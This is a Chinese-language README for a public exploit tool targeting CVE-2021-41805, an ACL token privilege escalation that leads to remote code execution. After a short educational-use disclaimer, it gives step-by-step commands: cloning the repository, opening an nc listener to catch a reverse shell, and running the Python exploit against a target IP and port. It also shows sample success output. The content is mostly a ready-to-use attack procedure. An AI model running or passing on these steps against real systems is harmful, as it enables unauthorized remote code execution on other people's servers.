[!WARNING] 法律免责声明: 此工具严格仅用于教育目的! 在未事先获得双方同意的情况下使用此工具攻击目标是非法的。 使用此工具时,用户有责任遵守所有适用法律。 此工具的开发者不承担任何责任,也不对因使用本程序而导致的任何滥用或损害负责。
一个 ACL 令牌(具有默认的 operator:write 权限)在一个命名空间中可用于在另一个命名空间中进行意外的权限提升。此漏洞可被滥用以获得提升权限的远程代码执行(RCE)。
git clone https://github.com/acfirthh/CVE-2021-41805.gitcd CVE-2021-41805nc -nvlp <LISTENER_PORT>python3 CVE-2021-41805.py -r <TARGET_IP> -rp <TARGET_PORT> -l <LISTENER_IP> -lp <LISTENER_PORT> [可选: -t <ACL token> -v (详细输出) -s (使用 SSL)]
使用基本参数运行漏洞利用:-r [目标IP]、-rp [目标端口]、-l [监听IP]、-lp [监听端口](-t [ACL令牌]、-s [使用SSL])将输出类似以下内容:
[*] PUT 请求成功。请检查你的监听器...
使用基本参数加上 -v [详细输出] 运行漏洞利用将输出详细内容:

如果运行漏洞利用时发生错误且指定了 -v 参数,输出将类似于:
